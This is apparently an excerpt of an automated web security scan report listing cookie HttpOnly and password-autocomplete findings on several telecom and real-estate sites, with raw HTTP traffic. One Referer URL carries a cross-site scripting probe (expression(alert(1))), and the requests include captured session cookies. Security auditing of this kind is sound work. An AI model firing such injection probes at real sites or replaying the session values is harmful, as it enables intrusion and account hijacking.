User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331733|PC#1315327839174-766376.19#1316539473|check#true#1315329933; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331673649%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520custcare%2520%7C1315331673661%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":6,"lc":{"d0":{"v":6,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 24713
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; domain=comcast.com; path=/
Date: Tue, 06 Sep 2011 12:24:44 GMT
Connection: Keep-Alive
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...

10.122. https://www.comcast.com/includes/js/IDGenerator.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /includes/js/IDGenerator.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/js/IDGenerator.ashx HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: https://www.comcast.com/Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B; fsr.a=1315328362332

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 11:59:21 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Set-Cookie: UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Expires: Tue, 06 Sep 2011 11:58:21 GMT
Content-Length: 0


10.123. http://www.fairpoint.com/residential/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /residential/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /residential/ HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0; __utma=35652279.1641746484.1315328322.1315328322.1315328322.1; __utmc=35652279; __utmz=35652279.1315328322.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fp_audience=residential; fp_state=VT; fp_city=Westfield; newloc=1; fp_zip=05874; fp_telco=NNE-VT

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Set-Cookie: activeBU=Residential; Expires=Tue, 06-Sep-2011 14:10:45 GMT; Path=/
Content-Type: text/html
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<link re
...[SNIP]...

10.124. http://www.fairpoint.com/servlet/CityTelcoMappingServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /servlet/CityTelcoMappingServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /servlet/CityTelcoMappingServlet HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
Content-Length: 9
Origin: http://www.fairpoint.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0; __utma=35652279.1641746484.1315328322.1315328322.1315328322.1; __utmc=35652279; __utmz=35652279.1315328322.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fp_audience=residential

zip=05874

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Set-Cookie: fp_state=VT; Expires=Wed, 05-Sep-2012 13:10:44 GMT; Path=/
Set-Cookie: fp_city=Westfield; Expires=Wed, 05-Sep-2012 13:10:44 GMT; Path=/
Set-Cookie: newloc=1; Expires=Wed, 05-Sep-2012 13:10:44 GMT; Path=/
Content-Length: 0
Content-Type: text/plain


10.125. http://www.frontier.com/Js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /Js/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Js/s_code.js HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; expires=Thu, 6-Sep-2012 11:50:33 GMT; path=/
Content-Length: 29119
Content-Type: application/x-javascript
Last-Modified: Thu, 05 May 2011 05:01:12 GMT
Accept-Ranges: bytes
ETag: "8cabb274e1acc1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:37 GMT

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */

/* Specify the Report Suite ID(s) to track here */
//d
...[SNIP]...

10.126. http://www.frontierpages.com/SelectRegion.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /SelectRegion.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SelectRegion.asp?uCity=Dallas&uState=TX&uG=1 HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 12:43:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.FrontierPages.com
Content-Length: 149
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:42:33 GMT
Set-Cookie: FrontierPages=uState=TX&uCity=Dallas; expires=Thu, 06-Oct-2011 04:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.FrontierPages.com">here</a>.</body>

10.127. http://www.frontierpages.com/scripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /scripts/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/s_code.js HTTP/1.1
Host: www.frontierpages.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://yp.frontierpages.com/results.aspx?searchby=&Termsearch=true&Partnerid=BRY-01&Pagesize=0&Pagenumber=1&Portal=Frontier&term=d5b57%22style%3d%22x%3aexpression(alert(1))%22d9518141ec5&city=Dallas&state=TX&zip=

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da947bCMYKY; expires=Thu, 6-Sep-2012 12:56:23 GMT; path=/
Content-Length: 17665
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Mar 2010 15:00:18 GMT
Accept-Ranges: bytes
ETag: "0ed9e84fb9ca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:56:30 GMT

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

//Dev
//var s_account="cznquapages"

//Prod
var s_account="cznpages"
...[SNIP]...

10.128. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=Cjmhv_whmToXXMKW0iAKGpdSMD6Dcv68CuPKl7DbmkvXnCQgAEAMoA1C_8LGh______8BYMme_obIo_waoAGYr4XTA8gBAaoEGk_QmetTV29NLOMpW9E7vyyfzeTAfEwS1dx4&ved=0CBIQ0Qw&val=ChAyNmVhN2ZlZjBhNmNmNDNiELDC9fIEGgiYlYRdTOTzRSABKAAw88uL57LFh-j1ATjy4fjyBEDViJXzBA&sig=AOD64_0ouNLDusjNPLpheBk3aPINK1Ws6w&adurl=http://shop.comcast.com/XFINITY/voice/%3FCMP%3DKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136%26iq_id%3D34270410 HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoUBQ2ptaHZfd2htVG9YWE1LVzBpQUtHcGRTTUQ2RGN2NjhDdVBLbDdEYm1rdlhuQ1FnQUVBTW9BMUNfOExHaF9fX19fXzhCWU1tZV9vYklvX3dhb0FHWXI0WFRBOGdCQWFvRUdrX1FtZXRUVjI5TkxPTXBXOUU3dnl5ZnplVEFmRXdTMWR4NBITCJK07_zGiKsCFRdsgwodjX172xgBIJDejJiwp7rEREgB; expires=Thu, 06-Oct-2011 11:50:37 GMT; path=/pagead/conversion/979457944/
Cache-Control: private
Location: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 06 Sep 2011 11:50:37 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


10.129. http://www.myfitv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:45:29 GMT
ETag: "1c6dae7fdca3cc1a86a9e8a293c50cc1"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.123781
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 77353
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...

10.130. http://www.myfitv.com/portal/recent_tv_elastic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /portal/recent_tv_elastic

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/recent_tv_elastic HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:29:50 GMT
ETag: "2698e5fdf58407cf7613e37e2b5b9b8c"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.026102
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 29645
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Yahoo Portal Module</title>

<script src="http://ajax.googleapis.com/ajax
...[SNIP]...

10.131. http://www.myfitv.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search?utf8=%E2%9C%93&query=xss HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:50:36 GMT
ETag: "b06b1c86b03c05bca43a7628c5a0a319"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIiUvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyIPc2Vzc2lvbl9pZCIlNGJlNWEzNzEyYTUxMzU2ZTk3NjdhZGUwZmQ4MGQ1MDg%3D--93112ebe330134a19c07b42f1f52e133e4c4f31d; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.106563
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 30810
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...

10.132. http://www.zillow.com/app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /app

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app?chartDuration=1year&chartType=partner&cityRegionId=0&countyRegionId=0&height=140&nationRegionId=102001&neighborhoodRegionId=0&page=webservice%2FGetRegionChart&service=chart&showNation=true&stateRegionId=0&width=268&zipRegionId=0 HTTP/1.1
Host: www.zillow.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
X-Internal-Host: 216
X-Requested-Session: D96C22773BC539FD5BC226F64BB0D4A5
Expires: Wed, 07 Sep 2011 10:00:00 GMT
Cache-Control: no-cache
Content-Type: image/gif
Set-Cookie: abtest=1|SearchUnused1%3D94%3AHDPFilmStrip%3D68%3AHDPFinanceModule%3D78%3ABlank%3D73%3AComboLoader%3D36%3ABALSelection%3D8%3ATNCWidgetViewType%3D63%3AMobileBALTest%3D6%3ABALTest%3D83%3AZMMHomepageUpsell%3D85; Domain=.zillow.com; Expires=Mon, 06-Sep-2021 00:45:19 GMT; Path=/
Via: 1.1 www.zillow.com
Vary: User-Agent
Content-Length: 3878

GIF87a....................f.RRR.........................................................................................................................................................................
...[SNIP]...

11. Password field with autocomplete enabled  previous  next
There are 16 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


11.1. https://login.comcast.net/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: http://xfinity.comcast.net/xpbar/1/default/?referrer=http%3A%2F%2Fsitesearch.comcast.com%2F&highlight=comcastcom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:39 GMT
Server: Apache
Cache-Control: private, max-age=0, no-cache, must-revalidate
Pragma: no-cache
Expires: Mon, 20 Dec 1998 01:00:00 GMT
X-FRAME-OPTIONS: DENY
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9634

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>    <title>Sign in to Comcast</title>
   <link rel="stylesheet" type="text/css" href="/static/css/s
...[SNIP]...
<div id="right">
   <form name="signin" action="https://login.comcast.net/login" method="post">
   <div id="signin" >
...[SNIP]...
</label>
       <input id="passwd" name="passwd" type="password" maxlength="128">
       <button type="submit" id="sign_in">
...[SNIP]...

11.2. https://login.frontier.com/webmail/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...
<br />

<form name="login" action="" method="post" target="_parent">
<div id="middle">
...[SNIP]...
